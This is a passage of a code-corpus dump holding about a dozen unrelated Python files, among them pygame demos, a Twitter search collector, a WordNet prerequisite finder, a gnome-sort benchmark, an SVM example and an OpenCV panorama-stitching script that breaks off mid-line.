# noqa: E501\n :type: str\n \"\"\"\n\n self._date_modified = date_modified\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, VMGroupMessageItem):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","sub_path":"starrez_client/models/vm_group_message_item.py","file_name":"vm_group_message_item.py","file_ext":"py","file_size_in_byte":11999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"337969762","text":"import numpy as np\nimport torch, torchvision\nfrom net.utils.graph import Graph\n\n\ndef get_hop_distance(num_node, edge, max_hop=1):\n A = np.zeros((num_node, num_node))\n for i, j in edge: # 构建邻接矩阵\n A[j, i] = 1 # 等同于A[j][i]\n A[i, j] = 1\n hop_dis = np.zeros((num_node, num_node)) + np.inf\n transfer_mat = [np.linalg.matrix_power(A, d) for d in range(max_hop + 1)] # 方矩阵乘法 d<0--对角矩阵;d>0--进行A的连乘\n temp = np.stack(transfer_mat)\n arrive_mat = (np.stack(transfer_mat) > 0) # transfer_mat是list类型,需要将list堆叠成一个数组才能进行>操作\n for d in range(max_hop, -1, -1):\n hop_dis[arrive_mat[d]] = d\n return A\n\n\ndef normalize_digraph(A): # 图卷积的预处理\n Dl = np.sum(A, 0) # n*n矩阵求和变为n*1\n num_node = A.shape[0]\n Dn = np.zeros((num_node, num_node))\n for i in range(num_node):\n if Dl[i] > 0:\n Dn[i, i] = Dl[i] ** (-1) # 由每个点的度组成的对角矩阵\n AD = np.dot(A, Dn)\n return AD\n\n\nnum_node = 18\nself_link = [(i, i) for i in range(num_node)]\nneighbor_link = [(4, 3), (3, 2), (7, 6), (6, 5), (13, 12), (12,\n 11),\n (10, 9), (9, 8), (11, 5), (8, 2), (5, 1), (2, 1),\n (0, 1), (15, 0), (14, 0), (17, 15), (16, 14)]\nedge = self_link + neighbor_link\nA = get_hop_distance(num_node, edge)\n# Graph.get_adjacency(A, 'spatial')\na = [[1, 2], [3, 4]]\nb = [[5, 6], [6, 7]]\nB = np.append(A, A)\nC = [[1,2], [3, 4], [5, 6], [6, 7]]\nC.append(a)\nC = np.array(C)\n\n#C_stack = np.stack(C)\nprint(C)\nprint('-----------------------------------------------------')\n#print(C_stack.shape)\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"173881854","text":"import pygame, graphics, math, ast\nfrom graphics import Box, BoxText, Text\n\nNA = 0\n\nSWIDTH = 1000\nSHEIGHT = 700\n\nLINEWIDTH = 6\nARROWLENGTH = 30\n\nROWSPACING = 25\n\ncx = SWIDTH / 2\ncy = SHEIGHT / 2\n\nyi = 20\n\n\ndef main():\n with open('assets/examples.txt') as f:\n example_data = f.readlines()\n examples = create_file_list(example_data)\n print(\"Possible word options:\")\n print_list(examples)\n word_of_interest = \"'\" + 
input(\"Input a word of interest: \") + \"'\"\n \n tree = create_tree_file(example_data, word_of_interest)\n tree = ast.literal_eval(tree)\n \n \"\"\"\n tree = [[{\"Language\":\"English\",\"Word\":\"'God be with you!'\"},{\"Language\":\"English\",\"Word\":\"'good'\"},\n {\"Language\":\"English\",\"Word\":\"'good morning'\"}],\n [{\"Language\":\"\",\"Word\":\"'goodbye'\"},{\"Language\":\"\",\"Word\":\"'goodbye'\"},\n {\"Language\":\"\",\"Word\":\"'goodbye'\"}]]\n \"\"\"\n \n pygame.init()\n\n screen = def_screen(SWIDTH, SHEIGHT)\n clock = pygame.time.Clock()\n running = True\n screen_dragging = False\n obj = []\n\n fontr = pygame.font.Font(\"assets/OpenDyslexic3-Regular.ttf\", 20)\n fontb = pygame.font.Font(\"assets/OpenDyslexic3-Bold.ttf\", 20)\n view_pos = 0, 0\n\n y = yi\n y, words = create_word(word_of_interest, fontr, fontb, yi)\n y += 2 * ROWSPACING\n y, branches = create_tree(tree, y, fontr, fontb)\n \n obj += branches\n obj += words\n\n obj += branches\n obj += words\n\n prev_mouse_pos = 0, 0\n\n while running:\n # main loop\n clock.tick(120)\n screen.fill(graphics.black)\n\n for el in obj:\n el.render(screen, view_pos)\n\n # events\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\n elif event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:\n screen_dragging = True\n prev_mouse_pos = event.pos\n\n elif event.type == pygame.MOUSEBUTTONUP and event.button == 1:\n screen_dragging = False\n\n elif event.type == pygame.MOUSEMOTION and screen_dragging:\n view_pos = view_pos[0] + prev_mouse_pos[0] - event.pos[0], \\\n view_pos[1] + prev_mouse_pos[1] - event.pos[1]\n prev_mouse_pos = event.pos\n\n pygame.display.flip()\n \ndef print_list(array):\n for el in array:\n print(el)\n\ndef create_file_list(file):\n array = []\n append = False\n for line in file:\n word = \"\"\n for char in line:\n if char == \"/\":\n break\n elif char != \"-\" and (char != '\"'):\n word += char\n append = True\n elif char == \"-\":\n break\n if append:\n array.append(word)\n append = False\n return array\n\ndef create_tree_file(file, word):\n add_char = False\n search = False\n tree = \"\"\n for line in file:\n if search:\n if \"/\" in line:\n for char in line:\n if char != \"/\":\n tree += char\n else:\n break\n elif word in line:\n search = True\n for char in line:\n if add_char == True:\n tree += char\n elif char == \"-\":\n add_char = True\n return tree\n \n\ndef create_word(word, font_text, font_title, yi):\n words = []\n # create object \"Word:\"\n word_txt = Text(\"Word:\", font_title, center_x=cx, y=yi)\n words.append(word_txt)\n # create object for the chosen word.\n y = yi + word_txt.rect.height + ROWSPACING * (3 / 4)\n word = BoxText(word, font_text, center_x=cx, y=y)\n words.append(word)\n\n yf = y + word.box.rect.height\n\n return yf, words\n\n\ndef create_tree(tree, starting_y, font_text, font_title):\n \"\"\"\n The tree should be of the form\n [[{\"Language\": \"Latin\", \"Word\": \"'sonus'\"}, {\"Language\": \"\", \"Word\": \"\"}],\n [{\"Language\": \"Anglo-Norman French\", \"Word\": \"'soun/suner'\"}, {\"Language\": \"\", \"Word\": \"\"}],\n [{\"Language\": \"Middle English\", \"Word\": \"'soun'\"},{\"Language\": \"English\", \"Word\": \"'-d'\"}],\n [{\"Language\": \"\", \"Word\": \"'sound'\"}, {\"Language\": \"\", \"Word\": \"'sound'\"}]]\n with \"\" representing empty space. Location of empty and non-empty space and the same dictionary (combined branches)\n indicate the tree branches. The list goes from top to bottom. 
The last word should not have language written down.\n Put repeating elements next to one another, in the columns where they step from. Please put the \"Word\"s in quotes for clarity.\n \"\"\"\n # [[language y], [word y]]\n columns = len(tree[0])\n col_spacing = SWIDTH / (columns + 1)\n prevcols = None\n y_larrow = 0\n row = 0\n obj = []\n overlap = 2\n\n # create object \"Origin Tree:\"\n y_tot = starting_y\n origin_txt = Text(\"Origin Tree:\", font_title, center_x=cx, y=y_tot)\n obj.append(origin_txt)\n\n y_tot += origin_txt.rect.height + ROWSPACING - (ARROWLENGTH + 2 * ROWSPACING)\n\n for row in tree:\n y_vals = [[0], [0], [0]]\n heights = [[0], [0], [0]]\n\n y_larrow = y_tot + ROWSPACING\n\n y_tot += ARROWLENGTH + 2 * ROWSPACING\n\n elements = []\n count = 1\n prev_el = None\n for col in range(len(row)):\n if prev_el is not None and row[col]['Word'] == prev_el['Word'] and row[col]['Language'] == prev_el['Language'] and not (row[col]['Word'] == \"\" and row[col]['Word'] == \"\"):\n count += 1\n if col == len(row) - 1:\n elements.append({\"Language\": row[col][\"Language\"], \"Word\": row[col][\"Word\"], \"Count\": count})\n else:\n if prev_el is not None:\n elements.append({\"Language\": prev_el[\"Language\"], \"Word\": prev_el[\"Word\"], \"Count\": count})\n if col == len(row) - 1:\n elements.append({\"Language\": row[col][\"Language\"], \"Word\": row[col][\"Word\"], \"Count\": count})\n count = 1\n\n prev_el = row[col]\n \n print(\"elements:\", elements)\n\n if prevcols is not None:\n y_hline = y_larrow\n for el in elements:\n el_count = el[\"Count\"]\n if el_count > 1:\n x_hline = (elements.index(el) + 1) * col_spacing - LINEWIDTH / 2\n len_hline = col_spacing * (el_count - 1)\n hline = Box(x=x_hline, y=y_hline, width=len_hline, height=LINEWIDTH)\n obj.append(hline)\n\n columns = len(elements)\n col_spacing = SWIDTH / (columns + 1)\n\n for el in elements:\n y_lang = y_word = y_tot\n\n if el[\"Language\"] != \"\":\n lang = BoxText(el[\"Language\"], font_text, center_x=0, y=y_lang)\n\n y_cline = y_lang + lang.box.rect.height - overlap\n y_word = y_lang + lang.box.rect.height + ROWSPACING\n\n y_vals[0].append(y_lang)\n heights[0].append(lang.box.rect.height)\n\n if el[\"Word\"] != \"\":\n word = BoxText(el[\"Word\"], font_text, center_x=0, y=y_word)\n\n y_vals[1].append(y_word)\n heights[1].append(word.box.rect.height)\n\n if el[\"Language\"] != \"\" and el[\"Word\"] != \"\":\n len_cline = abs(word.box.rect.centery - lang.box.rect.centery - lang.box.rect.height + overlap * 2)\n cline = Box(center_x=0, y=y_cline, width=LINEWIDTH, height=len_cline)\n\n y_vals[2].append(y_cline)\n heights[2].append(cline.rect.height)\n\n y_lang = max(y_vals[0])\n y_word = max(y_vals[1] + y_vals[0])\n y_cline = max(y_vals[2])\n y_tot += max(heights[0]) + max(heights[1]) + max(heights[2]) - 2 * overlap\n\n x_col = 0\n for el in elements:\n x_col += col_spacing\n if el[\"Language\"] != \"\":\n lang = BoxText(el[\"Language\"], font_text, center_x=x_col, y=y_lang)\n obj.append(lang)\n\n if el[\"Word\"] != \"\":\n word = BoxText(el[\"Word\"], font_text, center_x=x_col, y=y_word)\n obj.append(word)\n\n if el[\"Language\"] != \"\" and el[\"Word\"] != \"\":\n cline = Box(center_x=x_col, y=y_cline, width=LINEWIDTH, height=len_cline)\n obj.append(cline)\n \n\n if prevcols != None:\n x_col = 0\n prevel = 0\n for el in row:\n x_col += col_spacing\n if prevel != el:\n row_i = tree.index(row)\n el_i = row.index(el)\n row_up = tree[row_i - 1]\n el_up = row_up[el_i]\n \n if (el[\"Word\"] != \"\" or el[\"Language\"] != 
\"\") and (el_up[\"Word\"] != \"\" or el_up[\"Language\"] != \"\"):\n larrow = Box(center_x=x_col, y=y_larrow, width=LINEWIDTH, height=ARROWLENGTH)\n obj.append(larrow)\n prevel = el\n\n prevcols = columns\n\n return y_tot, obj\n\ndef drawTriangle(window, center, radius, width, color, rotation):\n dx = dy = 0\n\n pointlist = []\n\n for i in range(2):\n \n pointlist.append((radius+center[0]+dx, dy+center[1]))\n\n # Rotate the corner by 60 degrees\n dy += math.sin(math.pi / 3)\n dx += math.cos(math.pi / 3)\n \n return pygame.draw.polygon(window, color, pointlist, width)\n\ndef branch_space(branches):\n return SWIDTH / (branches + 1)\n\n\ndef def_screen(width, height):\n return pygame.display.set_mode((width, height))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"267103335","text":"# Tree Node\nclass Node:\n def __init__(self, data, left=None, right=None):\n self.data = data\n self.left = left\n self.right = right\n\ndef valid_tree(root):\n nums = []\n # inorder走一遍\n traversal(root, nums)\n\n # 檢查走訪的order是否正確(正確: 小->大)\n for i in range(len(nums)-1):\n if nums[i] > nums[i+1]:\n return True\n return False\n\ndef traversal(node, nums):\n if node == None:\n return\n traversal(node.left, nums)\n nums.append(node.data)\n traversal(node.right, nums)\n\nif __name__ == '__main__':\n # inputs = [5,1,4,None,None,3,6]\n root = Node(5)\n root.left = Node(1)\n root.right = Node(4)\n root.left.left = None\n root.left.right = None\n root.right.left = Node(3)\n root.right.right = Node(6)\n \n # inputs = [2,1,3]\n # root = Node(2)\n # root.left = Node(1)\n # root.right = Node(3)\n \n print(valid_tree(root))\n","sub_path":"interviews/sourcezones_exam/2_valid_tree.py","file_name":"2_valid_tree.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"252639459","text":"import twitter\nimport os\nfrom dotenv import load_dotenv\nfrom urllib.parse import unquote\nfrom data_collection.db_utils import save_tweets_to_mongodb\nimport logging\n\n\ndef setup_twitter_api(retry=False):\n \"\"\"\n Returns an instance of the Twitter object which can be used to make subsequent queries\n :param retry: indicates whether to retry a request when the rate limit is reached\n \"\"\"\n # Setup Twitter API\n load_dotenv()\n\n api_key = os.getenv(\"TWITTER_API_KEY\")\n api_secret = os.getenv(\"TWITTER_API_SECRET\")\n\n auth = twitter.oauth.OAuth(\"\", \"\", api_key, api_secret)\n\n return twitter.Twitter(auth=auth, retry=retry)\n\n\ndef get_query_args(users_list, to_or_from=\"from\", since_id=None):\n \"\"\"\n Get arguments for search query for tweets from users or replies to to users\n :param users_list: List of users from whom to retrieve the tweets.\n :param to_or_from: Whether the query should retrieve tweets to (replies) or from these accounts.\n :param since_id: Id of the tweet whose date is the earliest date from which to retrieve tweets\n :return: a dict object with the arguments\n \"\"\"\n\n # This creates a query of the form \"to:user1 OR to:user2...\" or \"from:user1 OR from:user2\"\n query_string = \" OR \".join([\"{}:{}\".format(to_or_from, user) for user in users_list])\n\n kwargs = {'q': query_string}\n if since_id is not None:\n kwargs['since_id'] = since_id\n\n return kwargs\n\n\ndef process_request(twitter_api, kwargs=None):\n \"\"\"\n 
Processes a request based on a query string.\n    :param twitter_api: The twitter api object.\n    :param kwargs: arguments to pass into the search query\n    :return: a dictionary with the tweets returned from the twitter api.\n    \"\"\"\n    tweets = {'statuses': [], 'search_metadata': {'next_results': \"\"}}\n    try:\n        tweets = twitter_api.search.tweets(**kwargs, tweet_mode='extended')\n    except Exception as e:\n        logging.debug(\"Exception: {}\".format(e))\n\n    return tweets\n\n\ndef get_tweets(initial_kwargs, twitter_api):\n    \"\"\"\n    Retrieves tweets from the twitter api based on the query string and saves them to the database.\n    :param initial_kwargs: Dictionary of arguments for the search query.\n    :param twitter_api: The twitter api object.\n    :return: Number of tweets retrieved for these arguments\n    \"\"\"\n    tweets = process_request(twitter_api, kwargs=initial_kwargs)\n    num_of_requests_made = 0\n    statuses = tweets['statuses']\n    search_results = tweets\n    tweets_retrieved = 0\n    while True:\n        if len(statuses) >= 100:\n            save_tweets_to_mongodb(statuses)\n            tweets_retrieved += len(statuses)\n            statuses = []\n        try:\n            next_results = search_results['search_metadata']['next_results']\n            kwargs = dict([kv.split(\"=\") for kv in unquote(next_results[1:]).split(\"&\")])\n            search_results = process_request(twitter_api, kwargs=kwargs)\n            statuses += search_results['statuses']\n            num_of_requests_made += 1\n        except Exception as e:\n            logging.info(\"No 'next_results', exiting: {}\".format(e))\n            break\n\n    if len(statuses) > 0:\n        save_tweets_to_mongodb(statuses)\n        tweets_retrieved += len(statuses)\n    logging.info(\"Number of requests before no results: {}\".format(num_of_requests_made + 1))\n    return tweets_retrieved\n","sub_path":"data_collection/twitter_api_utils.py","file_name":"twitter_api_utils.py","file_ext":"py","file_size_in_byte":3358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"95399873","text":"import c2py\nfrom repeat import *\n\nADDRESS = 0x0F\n\nPWM_CMD_SET = 1\n\ndef setpos( s, pos ):\n    \"\"\"Set servo number s to position pos.\n    Pos ranges between 0 and 100.
\"\"\"\n\n pos = int((pos/100.0) * 180)\n\n v = pos << 8 | s\n\n setword( ADDRESS, PWM_CMD_SET, v)\n\n","sub_path":"boards/slug/pyenv/tag/0.03/pwm.py","file_name":"pwm.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"532951781","text":"# permet d'accéder aux fonctions du module pygame\nimport pygame\n \n# Define some colors\nBLACK = [0, 0, 0]\nWHITE = [255, 255, 255]\nGREEN = [0, 255, 0]\nRED = [255, 0, 0]\nBLUE = [0 , 0 , 255]\n \n# initialisation de l'écran de jeu\npygame.init()\n \n# Set the height and width of the screen\nscreen_size = [800, 600]\nscreen = pygame.display.set_mode(screen_size)\n \npygame.display.set_caption(\"Bouncing Ball\")\n \n# Used to manage how fast the screen updates\nclock = pygame.time.Clock()\n \n# Starting position \nbox_x = 50\nbox_y = 300\n \n# Speed and direction\nbox_change_x = 3\nbox_change_y = 3\n\n# Size\nbox_rayon= 5 * 2\n\n# Loop until the user clicks the close button.\ndone = False\n\n# État du colour du palet\netat = 0\n \n# -------- Main Program Loop -----------\nwhile not done:\n event = pygame.event.Event(pygame.USEREVENT) # Remise à zero de la variable event\n\t\n # EVENEMENTS\n # détecte le clic sur le bouton close de la fenêtre\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n \n # LOGIQUE\n # Move the rectangle \n box_x += box_change_x\n box_y += box_change_y\n \n # Rebond\n if box_y > screen_size[1] or box_y < 0:\n box_change_y = box_change_y * -1\n etat = 1 - etat\n if box_x > screen_size[0] or box_x < 0:\n box_change_x = box_change_x * -1\n etat = 1 - etat\n \n #DESSIN\n # Set the screen background\n screen.fill(WHITE)\n \n # Draw screen border\n pygame.draw.rect(screen,GREEN,[0,0, screen_size[0] , screen_size[1]],1)\n \n #dessine le palet\n pygame.draw.circle(screen, BLUE, [box_x, box_y], box_rayon * 5)\n if etat == 0:\n pygame.draw.circle(screen, RED, [box_x, box_y], box_rayon )\n else:\n pygame.draw.circle(screen, GREEN, [box_x, box_y], box_rayon )\n # Limit to 30 frames per second\n clock.tick(30)\n \n # bascule l'affichage à l'écran\n pygame.display.flip()\n\n #debug\n #print('position ({0:3d},{1:3d}) and (dx,dy): ({2},{3})'.format(box_x,box_y,box_change_x,box_change_y))\n \n# Close everything down\npygame.quit()\n","sub_path":"EX 1 bouncing ball.py","file_name":"EX 1 bouncing ball.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"453423104","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\nimport nltk;\nfrom nltk.corpus import wordnet as wn;\nfrom app import db\nfrom app.models import Baseline_Methods\n\nclass Method_1():\n \"\"\" Class for evaluating prerequisite relationship using \n hyponyms, hypernyms and meronyms \"\"\"\n \n def __init__(self, words, bid, cap):\n self.words = words\n self.bid = bid\n self.cap = cap\n self.pre_req = dict.fromkeys(words)\n for word in self.pre_req:\n self.pre_req[word] = []\n\n\n def hyponyms(self, concept):\n \"\"\" get a concept and takes all meanings from wordnet. Then gets all the hyponyms of \n that word and check if it's inside the list words\"\"\"\n meanings = wn.synsets(concept)\n for word in meanings:\n for types in word.hyponyms():\n for lemma in types.lemmas():\n self.search_hypo(concept, lemma.name().lower())\n \n def hypernyms(self, concept):\n \"\"\" get a concept and takes all meanings from wordnet. 
Then gets all the hypernyms of \n that word and check if it's inside the list words\"\"\"\n meanings = wn.synsets(concept)\n for word in meanings:\n for paths in (word.hypernym_paths()):\n for level in paths:\n for lemma in level.lemmas():\n self.search(concept, lemma.name().lower())\n \n def meronyms(self, concept):\n \"\"\" get a concept and takes all meanings from wordnet. Then gets all the different meronyms of \n that word and check if it's inside the list words\"\"\"\n meanings = wn.synsets(concept)\n for word in meanings:\n for meronym in word.part_meronyms():\n for lemma in meronym.lemmas():\n self.search(concept, lemma.name().lower())\n for meronym in word.substance_meronyms():\n for lemma in meronym.lemmas():\n self.search(concept, lemma.name().lower())\n for meronym in word.member_holonyms():\n for lemma in meronym.lemmas():\n self.search(concept, lemma.name().lower())\n \n \n def search(self, concept, lemma):\n if(lemma in self.words):\n self.pre_req[concept].append(lemma)\n \n def search_hypo(self, concept, lemma):\n if(lemma in self.words):\n self.pre_req[lemma].append(concept)\n \n def populate_db(self, words, bid, cap):\n \"\"\" loop inside words and create or update the corrisponding row in Baseline_methods table. The value of m1 is based \n on the presence of lemma2 inside pre_req[lemma1] \"\"\"\n for concept in words:\n for lemma in [lemma for lemma in words if concept != lemma]:\n bs = Baseline_Methods.query.filter_by(bid=bid, cap=cap, lemma1=concept, lemma2=lemma).first()\n if not bs:\n if lemma in self.pre_req[concept]:\n bs = Baseline_Methods(bid=bid, cap=cap, lemma1=concept, lemma2=lemma, m1=1)\n db.session.add(bs)\n else:\n bs = Baseline_Methods(bid=bid, cap=cap, lemma1=concept, lemma2=lemma, m1=0)\n db.session.add(bs)\n else: \n if lemma in self.pre_req[concept]:\n bs.m1 = 1 \n elif not bs.m1:\n bs.m1 = 0\n db.session.commit()\n \n def method_1(self):\n self.words = [word.lower() for word in self.words]\n \n \n for i,word in enumerate(self.words):\n self.words.remove(word)\n self.hyponyms(word)\n self.hypernyms(word)\n self.meronyms(word)\n self.words.insert(i, word)\n \n self.populate_db(self.words, self.bid, self.cap)","sub_path":"app/Method_01.py","file_name":"Method_01.py","file_ext":"py","file_size_in_byte":3953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"421918357","text":"import json\nimport time\n\nfrom admanagerplusclient.base import Base\n\n\nclass Deal(Base):\n\n def get_all(self, seat_id):\n deals = []\n added = {}\n page = 0\n limit = 100\n\n while True:\n page += 1\n expected_total = page * limit\n endpoint = f\"{self.dsp_host}/traffic/deals\"\n params = {\n \"page\": page,\n \"limit\": limit,\n \"seatId\": seat_id\n }\n\n response = json.loads(self.make_request(endpoint, self.headers, 'GET', params=params))\n\n if response.get('msg_type') == \"error\":\n for error in response.get('data').get('validationMessages'):\n if error.get('propertyName') == \"RPM\":\n print(\"\")\n print(\"\")\n print(\"\")\n print(\"Traffic Limit Exceeded Sleeping...\")\n time.sleep(61)\n print(\"\")\n print(\"\")\n print(\"\")\n\n response = json.loads(self.make_request(endpoint, self.headers, 'GET', params=params))\n\n if response.get('msg_type') == \"success\":\n for deal in response.get('data').get('response'):\n deal_id = deal.get('exchangeDealId')\n push_id = deal.get('id')\n\n if added.get(push_id) is None:\n added[push_id] = deal_id\n deals.append(deal)\n\n if int(len(deals)) != int(expected_total):\n 
break\n\n response['data'] = deals\n\n return json.dumps(response)\n","sub_path":"admanagerplusclient/deal.py","file_name":"deal.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"260228992","text":"import pandas as pd\nimport os\n\nfrom django.conf import settings\n\nfrom common.command import Command\nfrom scraper.feature.ids import IDSParser\n\n\nclass Command(Command):\n help = 'Add TLDs features for domains'\n input_file = os.path.join(settings.R, 'train_2w.csv')\n output_file = os.path.join(settings.R, 'train_2w_tld.csv')\n\n def handle(self, *args, **options):\n\n self.info('Add TLDs features for domains')\n\n df = pd.read_csv(self.input_file)\n good_df = df[df['price'] > 0]\n\n domains = list(good_df.fullname)\n names = [fullname.split('.')[0] for fullname in domains]\n\n ids = IDSParser()\n\n res = ids.get(names, num_workers=100)\n\n self.info('Done getting TLD features from IDS')\n\n df = pd.DataFrame(res)\n df.to_csv(self.output_file, index=False)\n\n self.info('Done writing TLD features from IDS')\n","sub_path":"flipdom/management/commands/add_tlds.py","file_name":"add_tlds.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"404385005","text":"import random\nimport timeit\nimport matplotlib.pyplot as plt\n\n\ndef gnome_sort(lista):\n tam = len(lista)\n index = 0\n while index < tam:\n if index == 0:\n index = 1\n if lista[index] >= lista[index - 1]:\n index = index + 1\n else:\n lista[index], lista[index - 1] = lista[index - 1], lista[index]\n index = index - 1\n\n\ndef desenha_grafico(x, y, file_name, label1, xl=\"Entradas\", yl=\"Saídas\"):\n fig = plt.figure(figsize=(10, 8))\n ax = fig.add_subplot(111)\n ax.plot(x, y, label=label1)\n ax.legend(bbox_to_anchor=(1, 1),bbox_transform=plt.gcf().transFigure)\n plt.ylabel(yl)\n plt.xlabel(xl)\n fig.savefig(file_name)\n\n\ntam = [10000,20000,50000,100000]\ntimes = []\nfor i in range(len(tam)):\n lista_aleatoria = list(range(1, tam[i] + 1))\n random.shuffle(lista_aleatoria)\n times.append(timeit.timeit(\"gnome_sort({})\".format(lista_aleatoria),\n setup=\"from __main__ import gnome_sort\", number=1))\n\n\ndesenha_grafico(tam, times, \"GraficoTempo.png\", \"Tempo gasto pelo gnome_sort\", xl=\"Tamanho da lista\", yl=\"Tempo\")\n","sub_path":"cont_11/gnome_sort.py","file_name":"gnome_sort.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"159652659","text":"\"\"\"\n================================================\nSVM: Separating hyperplane with weighted classes\n================================================\n\n\"\"\"\n\nimport numpy as np\nimport pylab as pl\nfrom scikits.learn import svm\n\n# we create 40 separable points\nnp.random.seed(0)\nn_samples_1 = 1000\nn_samples_2 = 100\nX = np.r_[1.5*np.random.randn(n_samples_1, 2), 0.5*np.random.randn(n_samples_2, 2) + [2, 2]]\nY = [0]*(n_samples_1) + [1]*(n_samples_2)\n\n# fit the model and get the separating hyperplane\nclf = svm.SVC(kernel='linear')\nclf.fit(X, Y)\n\nw = clf.coef_[0]\na = -w[0]/w[1]\nxx = np.linspace(-5, 5)\nyy = a*xx - (clf.intercept_[0])/w[1]\n\n\n# get the separating hyperplane using weighted classes\nwclf = svm.SVC(kernel='linear')\nwclf.fit(X, Y, {1: 10})\n\nww = wclf.coef_[0]\nwa = -ww[0]/ww[1]\nwyy = wa*xx - (wclf.intercept_[0])/ww[1]\n\n# plot separating hyperplanes and 
samples\npl.set_cmap(pl.cm.Paired)\npl.plot(xx, yy, 'k-')\npl.plot(xx, wyy, 'k--')\npl.scatter(X[:,0], X[:,1], c=Y)\n\npl.axis('tight')\npl.show()\n\n","sub_path":"examples/svm/plot_weighted_classes.py","file_name":"plot_weighted_classes.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"479586739","text":"\"\"\"\nWritten by S Divakar Bhat\nRoll No: 18307R004\nTitle: Generalised panoramic mosaicing\n\"\"\"\n\nimport argparse\nimport os\nimport cv2\nimport numpy as np\n# import matplotlib.pyplot as plt\n\n\ndef get_kps_ftrs(image):\n \"\"\"\n Function to get keypoints and features of image using ORB\n \"\"\"\n orb = cv2.ORB_create()\n return orb.detectAndCompute(image, None)\n\n\ndef get_homography(ref_image, image2):\n \"\"\"\n Get homography matrix for each pair of images\n Input: two images\n Output: Homography matrix\n \"\"\"\n kps1, ftrs1 = get_kps_ftrs(ref_image)\n kps2, ftrs2 = get_kps_ftrs(image2)\n matcher = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\n matched = matcher.match(ftrs1, ftrs2)\n matched.sort(key=lambda x: x.distance)\n matched = matched[:int(len(matched)*0.9)]\n kps1 = np.array([kps.pt for kps in kps1])\n kps2 = np.array([kps.pt for kps in kps2])\n pts1 = np.array([kps1[x.queryIdx] for x in matched])\n pts2 = np.array([kps2[x.trainIdx] for x in matched])\n homo, _ = cv2.findHomography(pts2, pts1, cv2.RANSAC, 5)\n return homo\n\n\ndef assign_pxl(img1, img2):\n \"\"\"\n assign pixel values by comparing the pixel locatiosn of left\n and warped image on right\n Input: Left and right image\n Output: combined image\n \"\"\"\n h_1, w_1 = img1.shape[:2]\n for i in range(w_1):\n for j in range(h_1):\n if(np.array_equal(img1[j, i], np.array([0, 0, 0])) and\n (np.array_equal((img2[j, i]), np.array([0, 0, 0])))):\n img2[j, i] = [0, 0, 0]\n elif np.array_equal(img2[j, i], np.array([0, 0, 0])):\n img2[j, i] = img1[j, i]\n return img2\n\n\ndef generalised_mosaic(images, ref_id):\n \"\"\"\n function for generalised panormaic mosaicing from given n images\n Input: set of images and reference image id\n Output: Stitched image\n \"\"\"\n\n left = images[0:ref_id]\n right = images[ref_id:]\n # print(len(left), len(right), len(images))\n\n left_1 = left[0]\n for img in left[1:]:\n inv_h = get_homography(img, left_1)\n f_1 = np.dot(inv_h, np.array([0, 0, 1]))\n inv_h[0][-1] += abs(f_1[0])\n inv_h[1][-1] += abs(f_1[1])\n y_shift = abs(int(f_1[1]))\n x_shift = abs(int(f_1[0]))\n dest_size = (left_1.shape[1]+img.shape[1],\n left_1.shape[0]+img.shape[0])\n temp = cv2.warpPerspective(left_1, inv_h, dest_size)\n temp[y_shift:img.shape[0]+y_shift, x_shift:img.shape[1]+x_shift] = img\n left_1 = temp\n # return temp\n\n for img in right:\n homo = get_homography(left_1, img)\n dest_dim = np.dot(homo, np.array([img.shape[1],\n img.shape[0], 1]))\n dest_dim = dest_dim/dest_dim[-1]\n dest_size = (left_1.shape[1]+img.shape[1],\n left_1.shape[0]+img.shape[0])\n temp = cv2.warpPerspective(img, homo, dest_size)\n temp = assign_pxl(left_1, temp)\n left_1 = temp\n result = temp\n return result\n\n\nif __name__ == \"__main__\":\n PARSE 